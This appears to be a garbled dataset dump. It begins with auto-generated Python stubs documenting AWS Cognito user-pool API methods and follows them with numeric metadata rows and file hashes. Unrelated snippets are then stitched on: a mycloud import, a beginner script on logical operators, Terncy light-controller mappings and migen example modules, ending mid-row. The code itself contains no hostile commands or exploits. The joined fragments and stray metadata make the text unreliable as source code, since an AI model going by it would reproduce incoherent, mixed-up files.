        ``Destination``, ``DeliveryMedium`` (``'SMS'`` or ``'EMAIL'``), and
        ``AttributeName``.
    """
    pass
def update_user_pool(self, UserPoolId: str, Policies: Dict = None, LambdaConfig: Dict = None, AutoVerifiedAttributes: List = None, SmsVerificationMessage: str = None, EmailVerificationMessage: str = None, EmailVerificationSubject: str = None, VerificationMessageTemplate: Dict = None, SmsAuthenticationMessage: str = None, MfaConfiguration: str = None, DeviceConfiguration: Dict = None, EmailConfiguration: Dict = None, SmsConfiguration: Dict = None, UserPoolTags: Dict = None, AdminCreateUserConfig: Dict = None, UserPoolAddOns: Dict = None) -> Dict:
"""
Updates the specified user pool with the specified attributes. If you don't provide a value for an attribute, it will be set to the default value. You can get a list of the current user pool settings with .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateUserPool>`_
**Request Syntax**
::
response = client.update_user_pool(
UserPoolId='string',
Policies={
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
LambdaConfig={
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string',
'PreTokenGeneration': 'string',
'UserMigration': 'string'
},
AutoVerifiedAttributes=[
'phone_number'|'email',
],
SmsVerificationMessage='string',
EmailVerificationMessage='string',
EmailVerificationSubject='string',
VerificationMessageTemplate={
'SmsMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string',
'EmailMessageByLink': 'string',
'EmailSubjectByLink': 'string',
'DefaultEmailOption': 'CONFIRM_WITH_LINK'|'CONFIRM_WITH_CODE'
},
SmsAuthenticationMessage='string',
MfaConfiguration='OFF'|'ON'|'OPTIONAL',
DeviceConfiguration={
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
EmailConfiguration={
'SourceArn': 'string',
'ReplyToEmailAddress': 'string',
'EmailSendingAccount': 'COGNITO_DEFAULT'|'DEVELOPER'
},
SmsConfiguration={
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
UserPoolTags={
'string': 'string'
},
AdminCreateUserConfig={
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
},
UserPoolAddOns={
'AdvancedSecurityMode': 'OFF'|'AUDIT'|'ENFORCED'
}
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
Represents the response from the server when you make a request to update the user pool.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool you want to update.
:type Policies: dict
:param Policies:
A container with the policies you wish to update in a user pool.
- **PasswordPolicy** *(dict) --*
The password policy.
- **MinimumLength** *(integer) --*
The minimum length of the password policy that you have set. Cannot be less than 6.
- **RequireUppercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
- **RequireLowercase** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
- **RequireNumbers** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
- **RequireSymbols** *(boolean) --*
In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
:type LambdaConfig: dict
:param LambdaConfig:
The AWS Lambda configuration information from the request to update the user pool.
- **PreSignUp** *(string) --*
A pre-registration AWS Lambda trigger.
- **CustomMessage** *(string) --*
A custom Message AWS Lambda trigger.
- **PostConfirmation** *(string) --*
A post-confirmation AWS Lambda trigger.
- **PreAuthentication** *(string) --*
A pre-authentication AWS Lambda trigger.
- **PostAuthentication** *(string) --*
A post-authentication AWS Lambda trigger.
- **DefineAuthChallenge** *(string) --*
Defines the authentication challenge.
- **CreateAuthChallenge** *(string) --*
Creates an authentication challenge.
- **VerifyAuthChallengeResponse** *(string) --*
Verifies the authentication challenge response.
- **PreTokenGeneration** *(string) --*
A Lambda trigger that is invoked before token generation.
- **UserMigration** *(string) --*
The user migration Lambda config type.
:type AutoVerifiedAttributes: list
:param AutoVerifiedAttributes:
The attributes that are automatically verified when the Amazon Cognito service makes a request to update user pools.
- *(string) --*
:type SmsVerificationMessage: string
:param SmsVerificationMessage:
A container with information about the SMS verification message.
:type EmailVerificationMessage: string
:param EmailVerificationMessage:
The contents of the email verification message.
:type EmailVerificationSubject: string
:param EmailVerificationSubject:
The subject of the email verification message.
:type VerificationMessageTemplate: dict
:param VerificationMessageTemplate:
The template for verification messages.
- **SmsMessage** *(string) --*
The SMS message template.
- **EmailMessage** *(string) --*
The email message template.
- **EmailSubject** *(string) --*
The subject line for the email message template.
- **EmailMessageByLink** *(string) --*
The email message template for sending a confirmation link to the user.
- **EmailSubjectByLink** *(string) --*
The subject line for the email message template for sending a confirmation link to the user.
- **DefaultEmailOption** *(string) --*
The default email option.
:type SmsAuthenticationMessage: string
:param SmsAuthenticationMessage:
The contents of the SMS authentication message.
:type MfaConfiguration: string
:param MfaConfiguration:
Can be one of the following values:
* ``OFF`` - MFA tokens are not required and cannot be specified during user registration.
* ``ON`` - MFA tokens are required for all user registrations. You can only specify required when you are initially creating a user pool.
* ``OPTIONAL`` - Users have the option when registering to create an MFA token.
:type DeviceConfiguration: dict
:param DeviceConfiguration:
Device configuration.
- **ChallengeRequiredOnNewDevice** *(boolean) --*
Indicates whether a challenge is required on a new device. Only applicable to a new device.
- **DeviceOnlyRememberedOnUserPrompt** *(boolean) --*
If true, a device is only remembered on user prompt.
:type EmailConfiguration: dict
:param EmailConfiguration:
Email configuration.
- **SourceArn** *(string) --*
The Amazon Resource Name (ARN) of a verified email address in Amazon SES. This email address is used in one of the following ways, depending on the value that you specify for the ``EmailSendingAccount`` parameter:
* If you specify ``COGNITO_DEFAULT`` , Amazon Cognito uses this address as the custom FROM address when it emails your users by using its built-in email account.
* If you specify ``DEVELOPER`` , Amazon Cognito emails your users with this address by calling Amazon SES on your behalf.
- **ReplyToEmailAddress** *(string) --*
The destination to which the receiver of the email should reply to.
- **EmailSendingAccount** *(string) --*
Specifies whether Amazon Cognito emails your users by using its built-in email functionality or your Amazon SES email configuration. Specify one of the following values:
COGNITO_DEFAULT
When Amazon Cognito emails your users, it uses its built-in email functionality. When you use the default option, Amazon Cognito allows only a limited number of emails each day for your user pool. For typical production environments, the default email limit is below the required delivery volume. To achieve a higher delivery volume, specify DEVELOPER to use your Amazon SES email configuration.
To look up the email delivery limit for the default option, see `Limits in Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/limits.html>`__ in the *Amazon Cognito Developer Guide* .
The default FROM address is no-reply@verificationemail.com. To customize the FROM address, provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
DEVELOPER
When Amazon Cognito emails your users, it uses your Amazon SES configuration. Amazon Cognito calls Amazon SES on your behalf to send email from your verified email address. When you use this option, the email delivery limits are the same limits that apply to your Amazon SES verified email address in your AWS account.
If you use this option, you must provide the ARN of an Amazon SES verified email address for the ``SourceArn`` parameter.
Before Amazon Cognito can email your users, it requires additional permissions to call Amazon SES on your behalf. When you update your user pool with this option, Amazon Cognito creates a *service-linked role* , which is a type of IAM role, in your AWS account. This role contains the permissions that allow Amazon Cognito to access Amazon SES and send email messages with your address. For more information about the service-linked role that Amazon Cognito creates, see `Using Service-Linked Roles for Amazon Cognito <https://docs.aws.amazon.com/cognito/latest/developerguide/using-service-linked-roles.html>`__ in the *Amazon Cognito Developer Guide* .
:type SmsConfiguration: dict
:param SmsConfiguration:
SMS configuration.
- **SnsCallerArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
- **ExternalId** *(string) --*
The external ID.
:type UserPoolTags: dict
:param UserPoolTags:
The tag keys and values to assign to the user pool. A tag is a label that you can use to categorize and manage user pools in different ways, such as by purpose, owner, environment, or other criteria.
- *(string) --*
- *(string) --*
:type AdminCreateUserConfig: dict
:param AdminCreateUserConfig:
The configuration for ``AdminCreateUser`` requests.
- **AllowAdminCreateUserOnly** *(boolean) --*
Set to ``True`` if only the administrator is allowed to create user profiles. Set to ``False`` if users can sign themselves up via an app.
- **UnusedAccountValidityDays** *(integer) --*
The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call ``AdminCreateUser`` again, specifying ``\"RESEND\"`` for the ``MessageAction`` parameter. The default value for this parameter is 7.
.. note::
If you set a value for ``TemporaryPasswordValidityDays`` in ``PasswordPolicy`` , that value will be used and ``UnusedAccountValidityDays`` will be deprecated for that user pool.
- **InviteMessageTemplate** *(dict) --*
The message template to be used for the welcome message to new users.
See also `Customizing User Invitation Messages <http://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pool-settings-message-customizations.html#cognito-user-pool-settings-user-invitation-message-customization>`__ .
- **SMSMessage** *(string) --*
The message template for SMS messages.
- **EmailMessage** *(string) --*
The message template for email messages.
- **EmailSubject** *(string) --*
The subject line for email messages.
:type UserPoolAddOns: dict
:param UserPoolAddOns:
Used to enable advanced security risk detection. Set the key ``AdvancedSecurityMode`` to the value \"AUDIT\".
- **AdvancedSecurityMode** *(string) --* **[REQUIRED]**
The advanced security mode.
:rtype: dict
:returns:
"""
pass
def update_user_pool_client(self, UserPoolId: str, ClientId: str, ClientName: str = None, RefreshTokenValidity: int = None, ReadAttributes: List = None, WriteAttributes: List = None, ExplicitAuthFlows: List = None, SupportedIdentityProviders: List = None, CallbackURLs: List = None, LogoutURLs: List = None, DefaultRedirectURI: str = None, AllowedOAuthFlows: List = None, AllowedOAuthScopes: List = None, AllowedOAuthFlowsUserPoolClient: bool = None, AnalyticsConfiguration: Dict = None) -> Dict:
"""
Updates the specified user pool app client with the specified attributes. If you don't provide a value for an attribute, it will be set to the default value. You can get a list of the current user pool app client settings with .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateUserPoolClient>`_
**Request Syntax**
::
response = client.update_user_pool_client(
UserPoolId='string',
ClientId='string',
ClientName='string',
RefreshTokenValidity=123,
ReadAttributes=[
'string',
],
WriteAttributes=[
'string',
],
ExplicitAuthFlows=[
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY'|'USER_PASSWORD_AUTH',
],
SupportedIdentityProviders=[
'string',
],
CallbackURLs=[
'string',
],
LogoutURLs=[
'string',
],
DefaultRedirectURI='string',
AllowedOAuthFlows=[
'code'|'implicit'|'client_credentials',
],
AllowedOAuthScopes=[
'string',
],
AllowedOAuthFlowsUserPoolClient=True|False,
AnalyticsConfiguration={
'ApplicationId': 'string',
'RoleArn': 'string',
'ExternalId': 'string',
'UserDataShared': True|False
}
)
**Response Syntax**
::
{
'UserPoolClient': {
'UserPoolId': 'string',
'ClientName': 'string',
'ClientId': 'string',
'ClientSecret': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'RefreshTokenValidity': 123,
'ReadAttributes': [
'string',
],
'WriteAttributes': [
'string',
],
'ExplicitAuthFlows': [
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY'|'USER_PASSWORD_AUTH',
],
'SupportedIdentityProviders': [
'string',
],
'CallbackURLs': [
'string',
],
'LogoutURLs': [
'string',
],
'DefaultRedirectURI': 'string',
'AllowedOAuthFlows': [
'code'|'implicit'|'client_credentials',
],
'AllowedOAuthScopes': [
'string',
],
'AllowedOAuthFlowsUserPoolClient': True|False,
'AnalyticsConfiguration': {
'ApplicationId': 'string',
'RoleArn': 'string',
'ExternalId': 'string',
'UserDataShared': True|False
}
}
}
**Response Structure**
- *(dict) --*
Represents the response from the server to the request to update the user pool client.
- **UserPoolClient** *(dict) --*
The user pool client value from the response from the server when an update user pool client request is made.
- **UserPoolId** *(string) --*
The user pool ID for the user pool client.
- **ClientName** *(string) --*
The client name from the user pool request of the client type.
- **ClientId** *(string) --*
The ID of the client associated with the user pool.
- **ClientSecret** *(string) --*
The client secret from the user pool request of the client type.
- **LastModifiedDate** *(datetime) --*
The date the user pool client was last modified.
- **CreationDate** *(datetime) --*
The date the user pool client was created.
- **RefreshTokenValidity** *(integer) --*
The time limit, in days, after which the refresh token is no longer valid and cannot be used.
- **ReadAttributes** *(list) --*
The Read-only attributes.
- *(string) --*
- **WriteAttributes** *(list) --*
The writeable attributes.
- *(string) --*
- **ExplicitAuthFlows** *(list) --*
The explicit authentication flows.
- *(string) --*
- **SupportedIdentityProviders** *(list) --*
A list of provider names for the identity providers that are supported on this client.
- *(string) --*
- **CallbackURLs** *(list) --*
A list of allowed redirect (callback) URLs for the identity providers.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- *(string) --*
- **LogoutURLs** *(list) --*
A list of allowed logout URLs for the identity providers.
- *(string) --*
- **DefaultRedirectURI** *(string) --*
The default redirect URI. Must be in the ``CallbackURLs`` list.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- **AllowedOAuthFlows** *(list) --*
Set to ``code`` to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
Set to ``token`` to specify that the client should get the access token (and, optionally, ID token, based on scopes) directly.
- *(string) --*
- **AllowedOAuthScopes** *(list) --*
A list of allowed ``OAuth`` scopes. Currently supported values are ``"phone"`` , ``"email"`` , ``"openid"`` , and ``"Cognito"`` .
- *(string) --*
- **AllowedOAuthFlowsUserPoolClient** *(boolean) --*
Set to TRUE if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
- **AnalyticsConfiguration** *(dict) --*
The Amazon Pinpoint analytics configuration for the user pool client.
- **ApplicationId** *(string) --*
The application ID for an Amazon Pinpoint application.
- **RoleArn** *(string) --*
The ARN of an IAM role that authorizes Amazon Cognito to publish events to Amazon Pinpoint analytics.
- **ExternalId** *(string) --*
The external ID.
- **UserDataShared** *(boolean) --*
If ``UserDataShared`` is ``true`` , Amazon Cognito will include user data in the events it publishes to Amazon Pinpoint analytics.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The user pool ID for the user pool where you want to update the user pool client.
:type ClientId: string
:param ClientId: **[REQUIRED]**
The ID of the client associated with the user pool.
:type ClientName: string
:param ClientName:
The client name from the update user pool client request.
:type RefreshTokenValidity: integer
:param RefreshTokenValidity:
The time limit, in days, after which the refresh token is no longer valid and cannot be used.
:type ReadAttributes: list
:param ReadAttributes:
The read-only attributes of the user pool.
- *(string) --*
:type WriteAttributes: list
:param WriteAttributes:
The writeable attributes of the user pool.
- *(string) --*
:type ExplicitAuthFlows: list
:param ExplicitAuthFlows:
Explicit authentication flows.
- *(string) --*
:type SupportedIdentityProviders: list
:param SupportedIdentityProviders:
A list of provider names for the identity providers that are supported on this client.
- *(string) --*
:type CallbackURLs: list
:param CallbackURLs:
A list of allowed redirect (callback) URLs for the identity providers.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
- *(string) --*
:type LogoutURLs: list
:param LogoutURLs:
A list of allowed logout URLs for the identity providers.
- *(string) --*
:type DefaultRedirectURI: string
:param DefaultRedirectURI:
The default redirect URI. Must be in the ``CallbackURLs`` list.
A redirect URI must:
* Be an absolute URI.
* Be registered with the authorization server.
* Not include a fragment component.
See `OAuth 2.0 - Redirection Endpoint <https://tools.ietf.org/html/rfc6749#section-3.1.2>`__ .
Amazon Cognito requires HTTPS over HTTP except for http://localhost for testing purposes only.
App callback URLs such as myapp://example are also supported.
:type AllowedOAuthFlows: list
:param AllowedOAuthFlows:
Set to ``code`` to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
- *(string) --*
:type AllowedOAuthScopes: list
:param AllowedOAuthScopes:
A list of allowed ``OAuth`` scopes. Currently supported values are ``\"phone\"`` , ``\"email\"`` , ``\"openid\"`` , and ``\"Cognito\"`` .
- *(string) --*
:type AllowedOAuthFlowsUserPoolClient: boolean
:param AllowedOAuthFlowsUserPoolClient:
Set to TRUE if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
:type AnalyticsConfiguration: dict
:param AnalyticsConfiguration:
The Amazon Pinpoint analytics configuration for collecting metrics for this user pool.
- **ApplicationId** *(string) --* **[REQUIRED]**
The application ID for an Amazon Pinpoint application.
- **RoleArn** *(string) --* **[REQUIRED]**
The ARN of an IAM role that authorizes Amazon Cognito to publish events to Amazon Pinpoint analytics.
- **ExternalId** *(string) --* **[REQUIRED]**
The external ID.
- **UserDataShared** *(boolean) --*
If ``UserDataShared`` is ``true`` , Amazon Cognito will include user data in the events it publishes to Amazon Pinpoint analytics.
:rtype: dict
:returns:
"""
pass
def update_user_pool_domain(self, Domain: str, UserPoolId: str, CustomDomainConfig: Dict) -> Dict:
"""
Updates the Secure Sockets Layer (SSL) certificate for the custom domain for your user pool.
You can use this operation to provide the Amazon Resource Name (ARN) of a new certificate to Amazon Cognito. You cannot use it to change the domain for a user pool.
A custom domain is used to host the Amazon Cognito hosted UI, which provides sign-up and sign-in pages for your application. When you set up a custom domain, you provide a certificate that you manage with AWS Certificate Manager (ACM). When necessary, you can use this operation to change the certificate that you applied to your custom domain.
Usually, this is unnecessary following routine certificate renewal with ACM. When you renew your existing certificate in ACM, the ARN for your certificate remains the same, and your custom domain uses the new certificate automatically.
However, if you replace your existing certificate with a new one, ACM gives the new certificate a new ARN. To apply the new certificate to your custom domain, you must provide this ARN to Amazon Cognito.
When you add your new certificate in ACM, you must choose US East (N. Virginia) as the AWS Region.
After you submit your request, Amazon Cognito requires up to 1 hour to distribute your new certificate to your custom domain.
For more information about adding a custom domain to your user pool, see `Using Your Own Domain for the Hosted UI <https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-pools-add-custom-domain.html>`__ .
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/UpdateUserPoolDomain>`_
**Request Syntax**
::
response = client.update_user_pool_domain(
Domain='string',
UserPoolId='string',
CustomDomainConfig={
'CertificateArn': 'string'
}
)
**Response Syntax**
::
{
'CloudFrontDomain': 'string'
}
**Response Structure**
- *(dict) --*
The UpdateUserPoolDomain response output.
- **CloudFrontDomain** *(string) --*
The Amazon CloudFront endpoint that Amazon Cognito set up when you added the custom domain to your user pool.
:type Domain: string
:param Domain: **[REQUIRED]**
The domain name for the custom domain that hosts the sign-up and sign-in pages for your application. For example: ``auth.example.com`` .
This string can include only lowercase letters, numbers, and hyphens. Do not use a hyphen for the first or last character. Use periods to separate subdomain names.
:type UserPoolId: string
:param UserPoolId: **[REQUIRED]**
The ID of the user pool that is associated with the custom domain that you are updating the certificate for.
:type CustomDomainConfig: dict
:param CustomDomainConfig: **[REQUIRED]**
The configuration for a custom domain that hosts the sign-up and sign-in pages for your application. Use this object to specify an SSL certificate that is managed by ACM.
- **CertificateArn** *(string) --* **[REQUIRED]**
The Amazon Resource Name (ARN) of an AWS Certificate Manager SSL certificate. You use this certificate for the subdomain of your custom domain.
:rtype: dict
:returns:
"""
pass
def verify_software_token(self, UserCode: str, AccessToken: str = None, Session: str = None, FriendlyDeviceName: str = None) -> Dict:
"""
Use this API to register a user's entered TOTP code and mark the user's software token MFA status as "verified" if successful. The request takes an access token or a session string, but not both.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/VerifySoftwareToken>`_
**Request Syntax**
::
response = client.verify_software_token(
AccessToken='string',
Session='string',
UserCode='string',
FriendlyDeviceName='string'
)
**Response Syntax**
::
{
'Status': 'SUCCESS'|'ERROR',
'Session': 'string'
}
**Response Structure**
- *(dict) --*
- **Status** *(string) --*
The status of the verify software token.
- **Session** *(string) --*
The session which should be passed both ways in challenge-response calls to the service.
:type AccessToken: string
:param AccessToken:
The access token.
:type Session: string
:param Session:
The session which should be passed both ways in challenge-response calls to the service.
:type UserCode: string
:param UserCode: **[REQUIRED]**
The one time password computed using the secret code returned by
:type FriendlyDeviceName: string
:param FriendlyDeviceName:
The friendly device name.
:rtype: dict
:returns:
"""
pass
def verify_user_attribute(self, AccessToken: str, AttributeName: str, Code: str) -> Dict:
"""
Verifies the specified user attributes in the user pool.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cognito-idp-2016-04-18/VerifyUserAttribute>`_
**Request Syntax**
::
response = client.verify_user_attribute(
AccessToken='string',
AttributeName='string',
Code='string'
)
**Response Syntax**
::
{}
**Response Structure**
- *(dict) --*
A container representing the response from the server from the request to verify user attributes.
:type AccessToken: string
:param AccessToken: **[REQUIRED]**
Represents the access token of the request to verify user attributes.
:type AttributeName: string
:param AttributeName: **[REQUIRED]**
The attribute name in the request to verify user attributes.
:type Code: string
:param Code: **[REQUIRED]**
The verification code in the request to verify user attributes.
:rtype: dict
:returns:
"""
pass
| 50.698219
| 672
| 0.543236
| 36,952
| 387,233
| 5.660397
| 0.037048
| 0.018976
| 0.014568
| 0.009485
| 0.863355
| 0.833905
| 0.808135
| 0.788892
| 0.774444
| 0.763127
| 0
| 0.006226
| 0.360834
| 387,233
| 7,637
| 673
| 50.704858
| 0.838856
| 0.808978
| 0
| 0.481308
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.481308
| false
| 0.509346
| 0.056075
| 0
| 0.542056
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 10
|
669cf503e44c76598655d2f2beaca96e99fc93b6
| 124
|
py
|
Python
|
mycloud/commands/drive/fs/__init__.py
|
ThomasGassmann/swisscom-my-cloud-backup
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | 4
|
2019-11-28T22:10:43.000Z
|
2022-01-23T15:18:26.000Z
|
mycloud/commands/drive/fs/__init__.py
|
ThomasGassmann/swisscom-my-cloud-backup
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | 18
|
2019-01-20T22:30:48.000Z
|
2020-06-09T21:16:07.000Z
|
mycloud/commands/drive/fs/__init__.py
|
thomasgassmann/mycloud-cli
|
97e222c45a54197c82c8f3a5d59aa20bf3382ed8
|
[
"MIT"
] | null | null | null |
from mycloud.commands.drive.fs.upsync import upsync_command
from mycloud.commands.drive.fs.downsync import downsync_command
| 41.333333
| 63
| 0.870968
| 18
| 124
| 5.888889
| 0.5
| 0.207547
| 0.358491
| 0.45283
| 0.490566
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 124
| 2
| 64
| 62
| 0.913793
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
66ac9d95879bfe0e276197a480e35f4dc5b5eadb
| 573
|
py
|
Python
|
python-logic/04-logical-operators.py
|
oviniciusoliveira/python-bootcamp
|
cd08ec4ec30049822c283a656307a5dcb25b5d99
|
[
"MIT"
] | null | null | null |
python-logic/04-logical-operators.py
|
oviniciusoliveira/python-bootcamp
|
cd08ec4ec30049822c283a656307a5dcb25b5d99
|
[
"MIT"
] | null | null | null |
python-logic/04-logical-operators.py
|
oviniciusoliveira/python-bootcamp
|
cd08ec4ec30049822c283a656307a5dcb25b5d99
|
[
"MIT"
] | null | null | null |
print('*-----Logical Operator (and)-----*')
high_income = True
good_credit = False
if high_income and good_credit:
print("Eligible for loan")
else:
print("Not eligible for loan")
print('\n*-----Logical Operator (or)-----*')
high_income = True
good_credit = False
if high_income or good_credit:
print("Eligible for loan")
else:
print("Not eligible for loan")
print('\n*-----Logical Operator (or)-----*')
student = True
print('\n*-----Logical Operator (not)-----*')
if not student:
print("Eligible for loan")
else:
print("Not eligible for loan")
| 21.222222
| 45
| 0.649215
| 78
| 573
| 4.666667
| 0.24359
| 0.181319
| 0.247253
| 0.164835
| 0.793956
| 0.793956
| 0.793956
| 0.793956
| 0.793956
| 0.568681
| 0
| 0
| 0.158813
| 573
| 26
| 46
| 22.038462
| 0.755187
| 0
| 0
| 0.714286
| 0
| 0
| 0.443281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.47619
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
dd4c45715955fe2918fdae997389d00f2bc722d5
| 1,126
|
py
|
Python
|
apps/controllerx/cx_devices/terncy.py
|
Crocmagnon/controllerx
|
d928d5fc8d7ab50a86417227d5b732aea43cb653
|
[
"MIT"
] | 204
|
2020-01-18T10:12:13.000Z
|
2022-03-27T09:40:17.000Z
|
apps/controllerx/cx_devices/terncy.py
|
Crocmagnon/controllerx
|
d928d5fc8d7ab50a86417227d5b732aea43cb653
|
[
"MIT"
] | 329
|
2020-01-17T17:18:53.000Z
|
2022-03-29T11:20:30.000Z
|
apps/controllerx/cx_devices/terncy.py
|
Crocmagnon/controllerx
|
d928d5fc8d7ab50a86417227d5b732aea43cb653
|
[
"MIT"
] | 66
|
2020-01-19T20:17:21.000Z
|
2022-03-13T15:03:41.000Z
|
from cx_const import DefaultActionsMapping, Light
from cx_core import LightController
from cx_core.integration import EventData
class TerncyPP01LightController(LightController):
def get_zha_actions_mapping(self) -> DefaultActionsMapping:
return {
"button_single": Light.TOGGLE,
"button_double": Light.ON_FULL_BRIGHTNESS,
"button_triple": Light.ON_MIN_BRIGHTNESS,
"button_quadruple": Light.SET_HALF_BRIGHTNESS,
"button_quintuple": Light.SET_HALF_COLOR_TEMP,
}
def get_zha_action(self, data: EventData) -> str:
return data["command"]
class TerncySD01LightController(LightController):
def get_zha_actions_mapping(self) -> DefaultActionsMapping:
return {
"button_single": Light.TOGGLE,
"button_double": Light.ON_FULL_BRIGHTNESS,
"button_triple": Light.ON_MIN_BRIGHTNESS,
"button_quadruple": Light.SET_HALF_BRIGHTNESS,
"button_quintuple": Light.SET_HALF_COLOR_TEMP,
}
def get_zha_action(self, data: EventData) -> str:
return data["command"]
| 35.1875
| 63
| 0.688277
| 119
| 1,126
| 6.168067
| 0.327731
| 0.13079
| 0.049046
| 0.065395
| 0.768392
| 0.768392
| 0.768392
| 0.768392
| 0.768392
| 0.768392
| 0
| 0.004603
| 0.228242
| 1,126
| 31
| 64
| 36.322581
| 0.840046
| 0
| 0
| 0.72
| 0
| 0
| 0.138544
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16
| false
| 0
| 0.12
| 0.16
| 0.52
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
06d11ac6b6242d7b80eac8fef069c7f957f23066
| 732
|
py
|
Python
|
unitbench/tests/modules/example.py
|
MaxenceCaronLasne/unitbench
|
6ee246f9d19594f3c9fb6a991c28fec9fda718b2
|
[
"BSD-2-Clause"
] | 1
|
2019-11-04T08:34:43.000Z
|
2019-11-04T08:34:43.000Z
|
unitbench/tests/modules/example.py
|
MaxenceCaronLasne/unitbench
|
6ee246f9d19594f3c9fb6a991c28fec9fda718b2
|
[
"BSD-2-Clause"
] | 2
|
2019-12-12T12:06:03.000Z
|
2019-12-16T18:43:25.000Z
|
unitbench/tests/modules/example.py
|
MaxenceCaronLasne/unitbench
|
6ee246f9d19594f3c9fb6a991c28fec9fda718b2
|
[
"BSD-2-Clause"
] | null | null | null |
from migen import Module, Signal
class ExampleModule(Module):
def __init__(self, width):
self.i_first = Signal(width)
self.i_second = Signal(width)
self.o_first = Signal(width)
self.o_second = Signal(width)
###
self.sync += [
self.o_first.eq(self.i_first),
self.o_second.eq(self.i_second)
]
class BadExampleModule(Module):
def __init__(self, width):
self.i_first = Signal(width)
self.i_second = Signal(width)
self.o_first = Signal(width)
self.o_second = Signal(width)
###
self.sync += [
self.o_first.eq(~self.i_first),
self.o_second.eq(~self.i_second)
]
| 21.529412
| 44
| 0.565574
| 91
| 732
| 4.285714
| 0.197802
| 0.230769
